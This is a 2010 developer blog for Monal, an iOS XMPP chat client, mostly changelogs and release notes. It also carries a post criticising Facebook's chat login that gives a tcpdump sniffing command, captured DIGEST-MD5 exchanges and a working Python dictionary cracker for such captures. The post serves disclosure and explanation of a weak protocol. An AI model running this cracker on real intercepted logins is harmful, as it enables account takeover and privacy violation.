Saturday, December 18, 2010

A shameless plug

I recently released my second iPhone/iPad app. It has absolutely nothing in common with Monal.  The program is called MyNepali and uses sounds and images to teach  young children some basic animal names in the Nepali language.  It is 99 cents. If you are interested, you can find MyNepali here
http://itunes.apple.com/us/app/mynepali/id406911355?mt=8

Tuesday, December 14, 2010

And we're back

I have no idea what happened. The email account that was used to create this blog was listed among the 1.3 million accounts taken in the Gawker hack on Sunday. While my account password was not there, I did get locked out of Gmail because of suspicious activity, likely thousands of failed login attempts from all over the world. I assume this blog was taken down for the same reason. This was annoying but could have been much worse: I could have been stupid and used the same password for my Gawker account and my email account.

The Gawker hack is one more reminder of  why trusting some third party with your Gmail, Facebook  or corporate login is a bad idea. While push messages are really nice, are you sure that the database that has your username and password is secure?  Do you trust the company making your IM client with all of that info?

Saturday, December 11, 2010

A note on privacy and tracking software

How many people use Monal? A lot. Thousands and thousands of people all over the world in all sorts of random places (Hello, Antarctica!). However, all I know is what the Apple download/upload  counter shows and what people tell me in emails.  Much the same way I have objections to ads in my software, I do not like the "metrics" software and libraries that are out there. Unlike many other iOS apps, Monal does not contain and will never contain user tracking software. Consider this app your refuge from ads, trackers and middle man servers.

Sunday, November 28, 2010

2.0.2 changelog

This is a bug fix update that addresses issues users have raised. I have tried to have one release roughly every month, but there will be no January release. Unless there is a major issue in this release, the next release will be in February.

1. fixed a bug where some people might not show up as online sometimes
2. fixed bug where away was not working
3. added status orbs
4. fixed bug adding accounts
5. several ipad ui improvements
6. SECURITY: fixed possible XSS attack
7. active chats count update properly
8. Misc connectivity bugfixes

Tuesday, November 2, 2010

Always free, no ads, no creepy servers

A lot of people have told me about being willing to see ads to support development. I actually really dislike ads and all the apps that I have used that had ads were slowed down by them. I also notice that certain other IM clients released versions without ads and then pushed updates with them after the user base grew. I find that to be a rather deceptive bait and switch particularly since I know that the ad services collect and use user data --possibly based on your chats-- to present more ads. It is behavior like this, the 3rd party account sign up nonsense and the lack of direct connections that prompted me to write Monal in the first place.

There will always be a free version of Monal, it will always support direct connections and it won't have ads.

Monday, October 18, 2010

2.0.1 bugfixes

I am pushing out a quick bugfix update to fix some issues people have told me about.


1. removes a lock up when user disconnects while chatting
2. added a progress indicator to show when large chats are loaded
3. fixed a compatibility bug with some ejabberd servers
4. fixed failure to load on some devices
5. added timeouts on connection to better detect errors
6. fixed the issue where sometimes the login window spins forever


Monday, October 11, 2010

Jabberd and Monal 2

I am receiving a few reports of issues connecting to some Jabberd servers. I haven't been able to replicate this on any of my test installs. If anyone has access to a server that is not working with Monal and can give me a test account to work with, email me.

Saturday, October 9, 2010

Monal 2.0 is out

The new release is now available for download in the app store. If you encounter any bugs, please email me at monaltest@gmail.com

Monday, October 4, 2010

Monal 2.0 iPad screen dump





Monal 2.0 iphone screen dump

While we are waiting for the new version to be approved, here are final screens for the iphone app's page




Sunday, October 3, 2010

back on track

I hope to have a new build sent to the app store on Monday

Thursday, September 30, 2010

Delayed!

A beta tester just found a rather serious bug that I need to check. I've pulled the binary and the release will be pushed into next week so I can look at this.

Wednesday, September 29, 2010

Monal 1.07 is now 2.0 and other updates

Monal has been submitted to the app store for approval. Don't be alarmed when you see Monal 2.0 show up on your application list. It is what was 1.07. I had to increase the version number to 2.0 because for some reason the application loader couldn't tell that 1.07 was greater than 1.062 and refused to allow me to upload an "older" version. It should be approved in a few days. While this isn't how I wanted 2.0 to be released, it is the biggest update to the software since it came out and it has been over a year since 1.0, so it's not that bad.

I have also added Monal to the business category in addition to social networking because of the cisco webex connect support.  The minimum iOS version has been changed to 3.1.2 from 3.1.3. Finally,  the application rating has been changed to 17+ since it includes a web browser.

Thursday, September 23, 2010

Monal 1.07 feature complete

Monal 1.07 is feature complete and is about to complete testing. Release candidate 1 was sent out to testers today. If no issues arise this will be the build submitted to the app store.

This is the final changelog of what to expect. In addition to the graphical overhaul, the other major change that will affect many people is support for group chat.

1.07 changelog

This is a major update that significantly changes the front and backends of the program.

1. Stops crash on load on iphone 3g and fixed many other bugs
2. faster start up and much more efficient login code (3-4x faster)
3. fixed bug where chat input box was disabled after viewing logs
4. urls in chat are detected and can be tapped to bring up safari when there is multi tasking or in app when there isn't.
5. Added a logoff button for easy logoff without closing app
6. contacts listed in alphabetical order, own username not shown
7. support for xmpp tunes, option to set status as currently playing ipod song
8. New ipad UI autorotates to all orientations, supports landscape
9. new lighter, faster and more accurate XMPP parsing engine
10. xmpp uses JID for setup
11. UI improvements for consistency
12. new sliding notification when a message is received or song changes
13. status updates are immediately seen
14. added a simple web browser for non multi tasking OSes
15. Icons update correctly when buddy changes it
16. added an active chats tab to access current conversations easily
17. added DNS SRV record discovery. this enables cisco webexconnect support in addition to greater compatibility overall.
18. added support for group chat
19. added support for itunes file transfer

Thursday, September 16, 2010

Cisco Webex connect support

I can confirm that the next version of the client connects to Cisco WebEx Connect XMPP servers. There are still a few quirks that I intend to iron out, but the basic functionality is working.

Edit 4/13/2011 :
 you can find instructions on the new monal site's  help page for webex

http://monal.im/help/cisco-webex/

Monday, September 13, 2010

DNS service discovery, priorities and Cisco Webex

It's not every day I learn about something totally new. I learned today that XMPP uses SRV records in DNS to determine which server and port a client should connect to: the client looks up _xmpp-client._tcp.<domain>, tries the records with the lowest priority value first, and uses the weight to spread connections among records of equal priority. I have now added XMPP DNS service discovery. This improves compatibility with servers across the board and in theory it should also enable connections to Cisco WebEx XMPP servers -- something several people have asked about. I will write back with confirmation.
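The selection rule described above, as an added Python example (this is not Monal's code, which is Objective-C). The SRV answer is constructed inline rather than fetched from DNS, so the ordering logic can be run offline; with a real domain you would feed it the output of `dig SRV _xmpp-client._tcp.example.com`. The `_FixedRng` stub only exists to make the weighted draw reproducible.

```python
import random
from dataclasses import dataclass
from typing import List, Sequence, Tuple


@dataclass(frozen=True)
class SrvRecord:
    """One _xmpp-client._tcp.<domain> SRV record, RFC 2782 field order."""
    priority: int
    weight: int
    port: int
    target: str


class _FixedRng:
    """Stub RNG for deterministic runs: always returns the upper bound."""
    def randint(self, a: int, b: int) -> int:
        return b


def order_srv(records: Sequence[SrvRecord], rng=None) -> List[SrvRecord]:
    """Order SRV records the RFC 2782 way.

    Lower priority value is tried first. Within one priority, records are
    drawn at random in proportion to their weight; weight-0 records are
    listed first so they are only picked when the random draw is 0.
    """
    rng = rng if rng is not None else random.Random()
    ordered: List[SrvRecord] = []
    for prio in sorted({r.priority for r in records}):
        bucket = sorted((r for r in records if r.priority == prio),
                        key=lambda r: r.weight != 0)  # weight-0 entries first
        while bucket:
            total = sum(r.weight for r in bucket)
            draw = rng.randint(0, total)
            running = 0
            for rec in bucket:
                running += rec.weight
                if running >= draw:
                    break
            ordered.append(rec)
            bucket.remove(rec)
    return ordered


def xmpp_client_targets(domain: str, srv_records: Sequence[SrvRecord],
                        default_port: int = 5222, rng=None) -> List[Tuple[str, int]]:
    """Turn an SRV lookup result into the (host, port) list a client should try.

    - no SRV records at all: fall back to <domain>:5222
    - a single record whose target is ".": the service is explicitly not offered
    - otherwise: RFC 2782 ordering of the records
    """
    if not srv_records:
        return [(domain, default_port)]
    if len(srv_records) == 1 and srv_records[0].target == ".":
        return []
    return [(r.target.rstrip("."), r.port) for r in order_srv(srv_records, rng)]


# Constructed answer for _xmpp-client._tcp.example.com (not a real lookup).
EXAMPLE_SRV = [
    SrvRecord(priority=20, weight=0,   port=5222, target="backup.example.com."),
    SrvRecord(priority=5,  weight=0,   port=5222, target="xmpp-a.example.com."),
    SrvRecord(priority=5,  weight=100, port=5223, target="xmpp-b.example.com."),
]

if __name__ == "__main__":
    for host, port in xmpp_client_targets("example.com", EXAMPLE_SRV):
        print(f"try {host}:{port}")
```

One caveat worth keeping in mind: plain DNS is not authenticated, so an attacker who can answer the SRV query can point the client at a host of their choosing. The TLS certificate therefore has to be checked against the domain the user typed (example.com), not against the SRV target name, unless the SRV answer was validated with DNSSEC.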

See debug logs below:
Gtalk:


Cisco:



Sunday, September 12, 2010

1.07 changelog so far

Development and testing on 1.07 is almost complete. This is the near final changelog. The one more addition to this will be multi user chat support.


1. Stops crash on load on iphone 3g.
2. faster start up and much more efficient login code (3-4x faster)
3. fixed  bug where chat input box was disabled after viewing logs
4. urls in chat are detected and can be tapped to bring up safari when there is multi tasking or in app when there isn't.
5. Added a logoff button for easy logoff without closing app
6. contacts listed in alphabetical order, own username not shown
7. support for xmpp tunes, option to set status as currently playing ipod song
8. New ipad UI autorotates to all orientations, supports landscape
9. new lighter, faster and more accurate XMPP parsing engine
10. xmpp uses JID for setup
11. UI improvements for consistency
12. new sliding notification when a message is received or  song changes
13. status updates are immediately seen
14. added a simple web browser for non multi tasking OSes
15. Icons update correctly when buddy changes it
16. added an active chats tab to access current conversations easily

Monday, September 6, 2010

Multi user chat

The next release will support joining multi user chats.

Saturday, September 4, 2010

Monal 1.07 Private Beta

I am ready to begin beta testing the next release of Monal. I am interested in making sure Monal works with as wide a range of XMPP servers as possible. If you are interested in joining the beta, please email monaltest@gmail.com with the subject: Monal 1.07 private beta.


In your email please include the following information:


1. whether you are using gmail, facebook or some other server.
2. if you are using some other server, do you know what it is (openfire, ejabberd etc.)
3. what device(s) you use (iPad, iPhone 3G, iPod touch etc.)
4. what ios version you use 
5. your device UDID ( http://www.tuaw.com/2008/08/08/iphone-101-find-udid-with-a-single-click/ )
6. what country you are in





Friday, September 3, 2010

In App Browser

For users of older iPhones and iPads that do not have multitasking, I have added a simple in-app web browser. This is under the More menu and takes up no additional resources since it uses the same message rendering engine. It's not Safari, but it should let you do other stuff while still receiving messages.


Sunday, August 29, 2010

iPads

The next release will have much better iPad support.

Sunday, August 22, 2010

More Changes: Meet The Slider

Monal now has the option to tap into itunes and use a neat little notification system. The black translucent overlay box slides in from the bottom and works like growl on OSX. Here are some preliminary shots. I plan on showing the song art/buddy icon and letting you tap on them to go to the incoming message.






Saturday, August 21, 2010

XMPP Feature list

This page  has been moved to

http://monal.im/topics/features/

    Changes

    I am improving the UI and trying to make it more intuitive while incorporating your feedback. The next release will look and behave differently in a few ways. Here are some of them:
    JIDs:

    Use of sliders instead of alert windows:



    Can run in any orientation on the ipad



    An explicit logout button






    Friday, August 20, 2010

    How to contact me

    If you need to contact me regarding Monal please email monaltest@gmail.com. You can also add me on gtalk or as a contact on your own jabber server.

    Wednesday, August 18, 2010

    More updates

    I've been overhauling the system to make it faster and more stable. It is noticeably better now.  This is the current change log


    1. Stops crash on load on iphone 3g.
    2. faster start up and much more efficient login code (3-4x faster)
    3. fixed  bug where chat input box was disabled after viewing logs
    4. urls in chat are detected and can be tapped to bring up safari
    5. Added a logoff button for easy logoff without closing app
    6. contacts listed in alphabetical order, own username not shown
    7. support for xmpp tunes, option to set status as currently playing ipod song

    Sunday, August 8, 2010

    iPhone 3G crash issue

    I have been testing more heavily on iPhone 3G iOS4 and have discovered the cause of the crash on load issue that many users have described.  It has now been fixed.  Bugs fixed so far for the next release:


    1. Stops crash on load on iphone 3g.
    2. sped up application start to prevent time out (crash)  on load
    3. fixed  bug where input box was disabled after viewing logs

    Saturday, July 31, 2010

    1.062 is in the store

    Use this thread to tell me about any issues you may have, questions or comments. I use this feed back to improve subsequent releases. Thanks.

    Friday, July 23, 2010

    1.062 pushed out

    Because I have been too busy to complete all the features I planned on having in 1.07, I have pushed out 1.062 with many of the bug fixes and user recommendations. It should be in the app store in a few days. This is the final change log:


    1. removed unnecessary XMPP commands (chatstates, pings) to reduce CPU/battery load
    2. xmpp keep alive increased to 4 minutes to reduce network/battery usage
    3. fixed bug where there was no vibration or ring when messages arrived
    4. made the idle logout notification only if an account is active
    5. background idle logout notification may be turned off
    6. fixed bug where disabling the account didn't disconnect it
    7. chat log: no duplicate names, names sorted in alphabetical order, own username no longer shown

    Saturday, July 3, 2010

    crashes and 1.07 changes so far

    These are the changes coming in 1.07 so far. I will fix things as I become aware of them. Some people still report iPad crashes. Please sync your iPads to iTunes so Apple sends me the crash log and I can see what's going on. I haven't been able to replicate them. Could someone still experiencing this problem try deleting the app and reinstalling it?


    1. fixed bug where there was no vibration or ring when messages arrived
    2. made the idle logout notification only if an account is active
    3. background idle logout notification may be turned off
    4. xmpp keep alive increased to 4 minutes to reduce network usage

    5. fixed bug where disabling the account didn't disconnect it



    Tuesday, June 22, 2010

    1.06 bugs, IPad and 1.061

    1.06 with multitasking is on the iTunes store. I made a mistake with the compile process and 1.06 will crash immediately on iPads since they still run OS 3. I have pushed out 1.061 which fixes this issue for iPad users.

    Use the comments on this post to tell me about problems you have experienced and anything else you might need to ask/tell me.

    Monday, June 14, 2010

    How background works in iOS4

    Background Apps
    iOS4 has several classes of background apps. Unfortunately, IM is not one of those classes. The classes that do exist are essentially for VoIP (network socket maintenance), audio (audio processing) and location services (full multitasking). Having run Monal in the background for a few weeks and seen the battery life, I now understand why Apple has done this. You are always aware of and interacting in some way with all of the classes of background apps allowed. You are either making a VoIP call, listening to audio or using GPS navigation. At no time do any of these background apps run without the user being aware of it. IM, on the other hand, is expected to run at all times. It runs silently in the background, using the CPU, keeping a connection open and generally draining the battery. It is entirely possible for someone to run an IM app, not be aware it is running and then begin to wonder why the battery only lasts a couple of hours. I have seen this happen time and again to Android users. Power users may be able to use the task manager to kill processes, but that is unreasonable for a mass market product.

    How Monal Works
    All of that being said, Monal does run in the background and the way it does it should satisfy the needs of most users.  Monal runs in the background for 10 minutes. After 5 minutes of idle time, it will push a notification that only 5 more minutes of background time remain.  After 10 minutes, the program will logout and suspend itself. A suspended program is not a drain on the battery.  If at any point in the 10 minutes you bring Monal back to the foreground, the clock will be reset for a fresh 10.

    When Monal is running in the background, it will push notifications to the user when messages are received.  The user will view/reply to the message and thus continuously reset the 10 minute clock.

    I think the typical user would sign in, move Monal to the background and do other things. They either send and receive messages and continuously reset the 10 minute clock, or at 5 minutes are asked to renew it for another 10 minutes by bringing Monal to the foreground once. This prevents the scenario where someone signs in and forgets to sign out, locks the phone and then completely drains the battery.


    What if someone wants to stay signed in while the phone is idle ?
    If you want to remain signed in while not using the phone, move Monal to the foreground before locking the phone. If you do this you will always be signed in and will receive notifications for all messages. When you want to use the phone again you can move it to the background and renew the 10 min lease periodically.

    Thursday, June 3, 2010

    Background apps

    Monal runs in the background now. When you go to another program, it will continue to remain connected using Apple's battery saving background processes. If you receive a message while in the background, you will see a pop up that looks like a push notification with the message. It will also popup a push notification if you have the home screen locked. 

    Monal 1.06 with multitasking will be released as soon as Apple releases the official SDK (expected to be June 7th).

    1.05 Approved

    Monal 1.05 has been approved and is in the app store. Grab it for your iPad and iPhones

    Sunday, May 30, 2010

    Crazy stuff

    OS4 is a blast to work with and I have gotten it to do some really crazy stuff to have Monal run seamlessly in the background. Hopefully these aren't bugs in the beta and   Apple will allow it.

    Sunday, May 23, 2010

    Final Change log for 1.05

    These are the changes in 1.05. This will be the final 3.x release. This should show up in iTunes soon.  I have already started programming for the multi tasking in 4.x . The next release will be a huge update and will drop as soon as 4.0 is released.


    1.05 changelog

    1. fixed all bugs from crash logs, made some speed improvements
    2. removed the confusing chat logs window edit button
    3. fixed bug where names of users signing in sometimes showed up in other chats
    4. opening conversation shows last 10 not 20 messages (faster load)
    5. the input box now allows multiple line input and expands when tapped on
    6. input box does not delete unsent messages  when tapping outside of the box
    7. Graphical  emoticons in chat
    8. added a basic  iPad interface
    9. Added button to quickly clear all conversation logs

    Saturday, May 22, 2010

    Ipads

    The iPhone Monal app already works on the iPad and I see from the crash logs that there are quite a few of you using it. The next release will be a universal application that takes advantage of the added space. The native iPad version doesn't look much different right now, I'm still learning all the new features. It's a start.

    Emoticons

    Sorry it took so long.

    Multi tasking.

    Monal runs in the background for a while on OS4. You should be able to switch back and forth between chat and other programs.

    1.05 in the works

    1.05 moving along well. Here is the change log so far for the next release.


    1.05 changelog

    1. fixed all bugs from crash logs
    2. removed the confusing chat log edit button
    3. fixed bug where names of users signing in sometimes showed up in other chats
    4. opening conversation shows last 10 not 20 messages (faster load)
    5. the input box now allows multiple line input and expands when tapped on
    6. input box does not delete unsent messages  when tapping outside of the box

    Friday, May 21, 2010

    Happy Birthday Monal

    It's been a whole year since the initial 1.0 release of  Monal (then called SworIM) was pushed out to the app store.  Thank you  all for the feedback, testing and generally helping me improve the software.
    It's come a long way in the past year and is going to keep improving in 2010. 
    A year ago:


    Today:



    Tuesday, May 4, 2010

    Iphone OS4 And More Server Support

    I can confirm that Monal 1.04 works fine in OS4.  While it doesn't fall under the class of programs allowed to multi task, I am planning on adding fast switch and  task completion which should hopefully allow you to switch between programs quickly without losing your connection.

    Work on Monal 1.05 will resume this week. Before OS4 comes out I want to get another version out that is focused on bug fixes and  server compatibility.  If you are aware of public servers that do not work, let me know in the comments section. If it is a private server and you can give me access to test, contact me at anurodhp@SPAM.gmail.com (remove the spam) with instructions. I will make sure it works in the next release.

    Tuesday, February 16, 2010

    1.04 getting pushed out

    I am about to push out 1.04 here is the final changelog



    1.04 changelog

    1. added support for SSL on port 5222 (new style, STARTTLS) (XMPP)
    2. added support for digest md5 authentication mechanism (XMPP)
    3. added support facebook chat (XMPP)
    4. added basic support for AOL Instant Messenger (AIM)
    5. uses the contact's full name from vCard if available instead of username (XMPP)
    6. opening a conversation shows the last 20 messages not 30. speeds up loading
    7. added network activity indicator on top bar
    8. fixed bug where some offline messages were being ignored
    9. fixed several crashing bugs
    10. fixed random disconnect/reconnect  issue
    11. modified message theme to have less image loading and better space use
    12. tested with jabberd2 servers

    There is  a new screen shot to go along with this of course



    Monday, February 15, 2010

    How weak is Facebook's XMPP security?

    As I mentioned earlier, Facebook does not use SSL on its new XMPP server. All of the security is based on an authentication mechanism called DIGEST-MD5. As the name says, it is built on the MD5 hash algorithm, which is no longer considered secure. From Facebook:


    No. At this time, Facebook Chat does not support SSL.
    Does Facebook Chat use plaintext authentication?
    No. Facebook Chat uses DIGEST-MD5 during authentication.

    Are my Chat messages encrypted?
    No. However, authentication information is secured using DIGEST-MD5.




    Regarding MD5: 
    US-CERT, the US Department of Homeland Security's Computer Emergency Readiness Team, says:
    • "Do not use the MD5 algorithm"
      "Software developers, Certification Authorities, website owners, and users should avoid using the MD5 algorithm in any capacity. As previous research has demonstrated, it should be considered cryptographically broken and unsuitable for further use."
    • "Scrutinize SSL certificates signed by certificates using the MD5 algorithm"
      "Users may wish to manually analyze the properties of web site certificates (...) Certificates listed as md5RSA or similar are affected. Such certificates that include strange or suspicious fields or other anomalies may be fraudulent. Because there are no reliable signs of tampering it must be noted that this workaround is error-prone and impractical for most users."

    No SSL:
    What happens when you don't use SSL for your chat? Anyone sniffing the network can see what you are saying, and it is very simple to do.
    Either use tcpdump from the command line (works on Mac, Linux etc.) or grab a packet sniffer like Wireshark. I would recommend Wireshark anyway because it makes the next part even easier. With tcpdump you would run something like this (the -s500 keeps only the first 500 bytes of each packet; use -s0 if you want whole packets):

    sudo tcpdump -i en0  -s500 -w ~/Desktop/DumpFile01.pcap -vv 


    Let's say you have a network dump and you open it in Wireshark. Set the display filter to jabber and you will start to see something like this. I've highlighted a message packet so you can see that I was able to read this message someone sent.

    Now everything sent on the network can be read, and the password "security" is based on MD5, right? Behold a captured password sequence:
    cmVhbG09ImNoYXQuZmFjZWJvb2suY29tIixub25jZT0iNjdFRDdCQTg3NjgwN0MyOEIzQUI2RkE2MzRGQTE2MDUiLHFvcD0iYXV0aCIsY2hhcnNldD11dGYtOCxhbGdvcml0aG09bWQ1LXNlc3M=

    this decodes from  base64 to:
    realm="chat.facebook.com",nonce="67ED7BA876807C28B3AB6FA634FA1605",qop="auth",charset=utf-8,algorithm=md5-sess


    Excellent we have some information. The client replied with:

    dXNlcm5hbWU9InNvbWVvbmUiLHJlYWxtPSJjaGF0LmZhY2Vib29rLmNvbSIsbm9uY2U9IjY3RUQ3QkE4NzY4MDdDMjhCM0FCNkZBNjM0RkExNjA1Iixjbm9uY2U9ImQzM2M4ODYyMTI2NjI2NTYzNzcxMDk3YjcwIixuYz0wMDAwMDAwMSxxb3A9YXV0aCxkaWdlc3QtdXJpPSJ4bXBwL2NoYXQuZmFjZWJvb2suY29tIixyZXNwb25zZT01MjBhMjdiOWRjOTE5NWRjMTJjNTVjZGY4MTUyOWI2MixjaGFyc2V0PXV0Zi04


    this decodes from base64 to:


    username="someone",realm="chat.facebook.com",nonce="67ED7BA876807C28B3AB6FA634FA1605",cnonce="d33c8862126626563771097b70",nc=00000001,qop=auth,digest-uri="xmpp/chat.facebook.com",response=520a27b9dc9195dc12c55cdf81529b62,charset=utf-8


    Nonce and cnonce are used to calculate the hashed "response". This is where the password is. nonce and cnonce are really there for one time use to prevent a replay attack.


    What do we know now?


    response (the password hash): 520a27b9dc9195dc12c55cdf81529b62
    nonce: 67ED7BA876807C28B3AB6FA634FA1605
    cnonce: d33c8862126626563771097b70
    qop: auth
    nc: 00000001




    The response is the end of a chain of MD5 hashes (RFC 2831):
    First hash (X) is MD5 of username:realm:password, kept as the raw 16 bytes rather than hex.
    We know this to be MD5(someone:chat.facebook.com:(password))
    Next hash (Y) is HEX(MD5(X:nonce:cnonce))
    We know this to be HEX(MD5(X:67ED7BA876807C28B3AB6FA634FA1605:d33c8862126626563771097b70))


    Next hash (Z) is fully known: HEX(MD5(AUTHENTICATE:xmpp/chat.facebook.com))

    The final hash is the response value, which is also known, and it is in the form:
    HEX(MD5(Y:nonce:nc:cnonce:qop:Z))

    We fully know Z, nonce, cnonce, qop and nc.

    The only thing missing is Y, which depends on X, which is just an MD5 of the password with a username and realm in front of it, and the attacker has both of those too. How would you crack this? Precomputed rainbow tables don't apply directly, because the nonce and cnonce change the final value on every login; what works is an offline dictionary or brute force attack: for each candidate password compute X, then Y, then the response, and compare it with the captured one. Each guess costs three MD5 operations and the server never sees any of them. I'm going to stop the explanation here for obvious reasons. More info on rainbow tables here:

    http://www.freerainbowtables.com/
    http://en.wikipedia.org/wiki/Rainbow_table
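    The chain of hashes above, carried through in code. This is an added Python example, not Monal's code, and the capture it attacks is constructed: the nonce and cnonce are the values from the post, the realm is changed to chat.example.com, and the "victim" client is simulated with a weak constructed password so that the cracker has something to recover. Run against a real capture, you would paste the base64-decoded challenge and response strings in place of the demo ones.

```python
import hashlib
import re
from typing import Dict, Iterable, Optional

# key=value pairs, values optionally quoted (RFC 2831 challenge/response syntax)
_FIELD_RE = re.compile(r'([A-Za-z][\w-]*)=(?:"([^"]*)"|([^,]*))')


def parse_digest_fields(text: str) -> Dict[str, str]:
    """Parse a base64-decoded DIGEST-MD5 challenge or response into a dict."""
    return {m.group(1): (m.group(2) if m.group(2) is not None else m.group(3))
            for m in _FIELD_RE.finditer(text)}


def digest_md5_response(username: str, realm: str, password: str, nonce: str,
                        cnonce: str, nc: str, qop: str, digest_uri: str,
                        authzid: Optional[str] = None) -> str:
    """Compute the DIGEST-MD5 response-value as RFC 2831 section 2.1.2.1 defines it.

    X = MD5(username:realm:password)                raw 16 bytes, not hex
    Y = HEX(MD5(X ":" nonce ":" cnonce [":" authzid]))
    Z = HEX(MD5("AUTHENTICATE:" digest-uri [":" 32 zeros for auth-int/auth-conf]))
    response = HEX(MD5(Y ":" nonce ":" nc ":" cnonce ":" qop ":" Z))
    """
    x = hashlib.md5(f"{username}:{realm}:{password}".encode("utf-8")).digest()
    a1 = x + f":{nonce}:{cnonce}".encode("utf-8")
    if authzid:
        a1 += f":{authzid}".encode("utf-8")
    y = hashlib.md5(a1).hexdigest()
    a2 = f"AUTHENTICATE:{digest_uri}"
    if qop in ("auth-int", "auth-conf"):
        a2 += ":" + "0" * 32
    z = hashlib.md5(a2.encode("utf-8")).hexdigest()
    return hashlib.md5(f"{y}:{nonce}:{nc}:{cnonce}:{qop}:{z}".encode("utf-8")).hexdigest()


def crack_digest_md5(challenge: str, response: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on one captured challenge/response pair.

    Everything but the password is in the capture, so each guess is three MD5
    calls on the attacker's own machine; the server is never contacted.
    """
    ch = parse_digest_fields(challenge)
    rs = parse_digest_fields(response)
    for guess in wordlist:
        candidate = digest_md5_response(
            rs["username"], rs.get("realm", ch.get("realm", "")), guess,
            rs["nonce"], rs["cnonce"], rs["nc"], rs.get("qop", "auth"),
            rs["digest-uri"], rs.get("authzid"))
        if candidate == rs["response"]:
            return guess
    return None


# --- Constructed capture. The client below stands in for the victim and answers
# --- the challenge with a weak password, producing what a sniffer would see.
DEMO_PASSWORD = "letmein1"   # constructed weak password
DEMO_CHALLENGE = ('realm="chat.example.com",nonce="67ED7BA876807C28B3AB6FA634FA1605",'
                  'qop="auth",charset=utf-8,algorithm=md5-sess')


def simulate_client(challenge: str, username: str, password: str, cnonce: str) -> str:
    """Build the response a (victim) client would send; used only to make the demo capture."""
    ch = parse_digest_fields(challenge)
    uri = f"xmpp/{ch['realm']}"
    resp = digest_md5_response(username, ch["realm"], password, ch["nonce"],
                               cnonce, "00000001", "auth", uri)
    return (f'username="{username}",realm="{ch["realm"]}",nonce="{ch["nonce"]}",'
            f'cnonce="{cnonce}",nc=00000001,qop=auth,digest-uri="{uri}",'
            f'response={resp},charset=utf-8')


DEMO_RESPONSE = simulate_client(DEMO_CHALLENGE, "someone", DEMO_PASSWORD,
                                "d33c8862126626563771097b70")
DEMO_WORDLIST = ["password", "123456", "qwerty", "letmein1", "iloveyou"]

if __name__ == "__main__":
    print("recovered password:", crack_digest_md5(DEMO_CHALLENGE, DEMO_RESPONSE, DEMO_WORDLIST))
```

    The point the code makes concrete: the nonces only stop replay of this particular response. They do nothing against guessing, because the attacker recomputes the whole chain per guess, and a password that appears in any wordlist falls out in milliseconds.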

    There is also the theoretical possibility of finding another string that produces the same X. Strictly that is a preimage attack rather than the collision attacks MD5 is known for, and no practical preimage attack on MD5 exists, so the guessing attack above is the real-world threat. An attacker who did find such a string would not need the actual password at all; they could use the other string in its place and access the account just the same.

    If the person is using a short or insecure password a dedicated  attacker (identity thieves, spammers etc) should have it cracked easily and since the packet was captured, the  attacker can test against the password as much as he likes on his own machine.

    Sunday, February 14, 2010

    New optimized space icon

    I've implemented the full stockholm theme now, each message  from a user does not load the icon and colored bar all over again. This leads to dramatically faster loading of chat windows and much better use of space.  Compare below to what we had before.


    The biggest improvement is in landscape mode with the keyboard on. You can now see up to 5 lines above the keyboard and the input box. 


    old landscape in 1.03

    1.04 will support Digest-Md5 and Facebook

    I have added Digest-Md5 support to Monal and it will be in 1.04 .  I added this because it is what Facebook uses.  I will have a Facebook preset in Monal with all of the server settings in 1.04. Hopefully facebook will fix the lack of SSL by then as well.  It also looks like I need to support aliases. Facebook chat is unusable and  confusing  without it.

    Saturday, February 13, 2010

    Monal supports AIM

    As I have said from the beginning, Monal will be a multi protocol instant messenger client. Something to look for in 1.04




    Friday, February 12, 2010

    Monal mentioned on Cnet podcast

    There is a mention of Monal and the Facebook XMPP security hole on today's Buzz Out Loud podcast. You can  hear it at 35:45 mark.
    Listen to it here:
    http://www.cnet.com/8301-19709_1-10452774-10.html

     People have also voted up the SSL bug on the Facebook developers site.

    Warning on Facebook XMPP

    I just finished looking at the new Facebook XMPP server.  I strongly recommend against using it. 

    This is probably one of the worst implementations ever. The chat does not use SSL encryption, unlike almost every other server. Better yet, they decided to use an authentication scheme called DIGEST-MD5, which, aside from having varying implementations and compatibility problems, was DEPRECATED by the IETF in January 2009 ( https://tools.ietf.org/html/draft-ietf-sasl-digest-to-historic ) because it can be cracked. Facebook has just opened up a gaping hole in their security. Someone at facebook needs to be fired.

    The link above explains many of the problems with Digest-MD5 but this is the best one.
      8.  The cryptographic primitives in DIGEST-MD5 are not up to today's
          standards, in particular:

          A.  The MD5 hash is sufficiently weak to make a brute force
              attack on DIGEST-MD5 easy with common hardware.

          B.  Using the RC4 algorithm for the security layer without
              discarding the initial key stream output is prone to attack.





    Thursday, February 11, 2010

    Facebook and 1.03

    Monal 1.03 has been released into the wild. Grab it from itunes.  As mentioned earlier, this version has the improved landscape and support for self signed SSL certificates.

    I just found out that Facebook added support for XMPP chat. Oddly, it uses the deprecated DIGEST-MD5 authentication and no SSL. Because DIGEST-MD5 was deprecated and SASL PLAIN over SSL was the de facto standard, I never bothered implementing it. I guess I have to do it now.

    Wednesday, February 10, 2010

    Improving SSL in 1.04 (works on 5222)

    This is probably one of the most requested features. SSL now works on port 5222 using the "new style" connection, where the stream starts in the clear and is upgraded to TLS with the STARTTLS command. It isn't 100% reliable yet, which is why it wasn't pushed out in yesterday's 1.03, but it will definitely be in 1.04. This, combined with the support for self-signed SSL certificates already in 1.03, should satisfy almost everyone.


    Tuesday, February 9, 2010

    1.03 submitted

    It's only been a few days since 1.02 was released, but I think I've gotten enough feedback to push out a quick 1.03 update. The improved landscape and SSL support should make the application much more usable and I saw no reason to sit on it. Expect 1.03 by the end of the week.

    The full changelog is below. I am also going to update the FAQ to clarify that 1.03 supports self-signed certificates.


    1. Self-signed SSL certificates now work
    2. Removed the non-public API that was used
    3. Improved XMPP support
    4. Message send failure is treated as a disconnection and handled automatically
    5. Navigation bar and status bar now disappear in landscape mode
    6. Now scrolls to the newest message when first going into a chat
    7. Adjusted brightness of the icon so it isn't so dark


    Monday, February 8, 2010

    Improving SSL in 1.03

    There has been some criticism on the iTunes store about the lack of support for self-signed certificates when using SSL. 1.03 now supports self-signed certificates.

    Saturday, February 6, 2010

    Improving landscape in 1.03

    A user pointed out to me that the old landscape mode had lots of wasted space at the top.  In 1.03, when the phone goes to landscape, the navigation bar and status bar disappear. This recovers that space and when using a keyboard, much more can be seen on top.

    Friday, February 5, 2010

    Monal 1.02 Approved

    You can grab the newest version on the iTunes store now.

    Don't forget to rate in iTunes and Digg!

    Tuesday, February 2, 2010

    Monal 1.02/1.03 FAQ

    Here is a quick list of things I think people should know when troubleshooting the next release. If there is anything else, post a comment and I will try to address it.

    What servers have you tested this with?

